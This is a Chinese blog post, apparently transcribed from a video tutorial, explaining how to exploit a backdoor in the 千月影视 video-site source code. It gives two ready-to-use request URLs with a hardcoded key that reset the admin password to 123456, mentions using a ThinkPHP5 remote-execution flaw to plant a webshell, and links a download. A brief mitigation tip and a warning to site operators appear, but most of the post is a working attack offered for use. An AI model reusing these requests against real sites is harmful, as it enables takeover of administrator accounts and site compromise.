千月影视0day利用教程

小帅帅 21819 0

大家好 我今天 教你们 千月影视双端 的后门利用方法

放首歌 先 电脑有点卡 ... 录屏就这样 崩溃了

这个是我刚才用工具扫出来的

这个应该是 千月影视双端 经典的样子 一眼就可以看出来

成功了 可能有的人说密码本身默认的

我继续给你们看一下

给你们解释一下 第一段代码是判断 用户名是否存在 第二段是修改 不光可以修改 管理员密码 还可以修改代理 知道用户名就可以

因为时间问题 这里我说一下 千月用的是tp5 框架还有 远程执行漏洞 直接放大马

这个应该是作者原本留的防止忘记密码 但是被黑客利用了

好了 本期到此结束

请多多关注发布本教程的网站 感谢你们的支持

域名+/login/login/yzcode?username=admin&key=465454&password=123456

域名+/login/login/repass?username=admin&key=465454&password=123456

链接: https://pan.baidu.com/s/1-d0gLpwlZjh4AtVRyL2FSQ 提取码: nzui

温馨提示:网上的源码没有一个是好的,一分钱一分货,各种后门代码不止这些,想要运营的话最好买一套好点的源码

使用方法:我们先运行第一段代码,如果显示成功,就是可以改密码,然后我们在运行第二段代码就可以了。

然后账号密码就变成admin 123456

预防方法:我们把管理员用户名更改一下,不要让别人知道就改不了,我演示是给大家看


第二版本讲解

千月影视双端漏洞,在运营的注意了!!

前几天已经爆出漏洞利用代码 拿后台!!!

接下来看好了!!

XXXX/login/login/yzcode?username=admin&key=465454&password=123456

复制以上代码

如果出现下面的结果,则表示可以更改


接下来

XXXX/login/login/repass?username=admin&key=465454&password=123456

显示


出现以上结果,则表示,

账户 admin

密码已被更改为123456

拿下

目前爆出来的漏洞适用于旧版本,账户名为admin的

………………

所以,在运营的 如果用户名为admin!!!请马上更改!!!个别有动手能力的 改了安全码的 那就不用了

标签: 0day web渗透

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~